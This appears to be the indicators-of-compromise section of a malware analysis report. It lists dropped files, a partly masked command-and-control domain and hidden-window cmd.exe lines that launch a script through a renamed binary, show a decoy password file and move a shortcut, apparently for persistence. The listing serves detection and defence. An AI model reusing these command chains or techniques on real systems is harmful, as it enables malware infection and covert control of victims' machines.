Technical Information

File paths:
- %TEMP%\box.lnk
- %TEMP%\qwgrp.js
- C:\users\public\scmp.exe
- %TEMP%\box.lnk
- %TEMP%\password.txt
Network activity:
- 'go####sheet.info':443
- 'microsoft.com':80
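- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt (a Microsoft root-certificate download; this request and the microsoft.com connection and DNS entries in this list are most likely routine Windows certificate-chain retrieval, so they are weak indicators on their own)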
- 'go####sheet.info':443
- DNS ASK go####sheet.info
- DNS ASK microsoft.com
Process command lines:
- 'C:\users\public\scmp.exe' "%TEMP%\qwgrp.js" www.go####sheet.info/ 1
- 'C:\users\public\scmp.exe' "%TEMP%\qwgrp.js" www.go####sheet.info/ 2
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO salary2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt" (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 1 & start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 2 & move "%TEMP%\Box.lnk" "%APPDATA%\M... (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO salary2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt"
- '%WINDIR%\syswow64\notepad.exe' %TEMP%\Password.txt
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 1 & start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 2 & move "%TEMP%\Box.lnk" "%APPDATA%\M...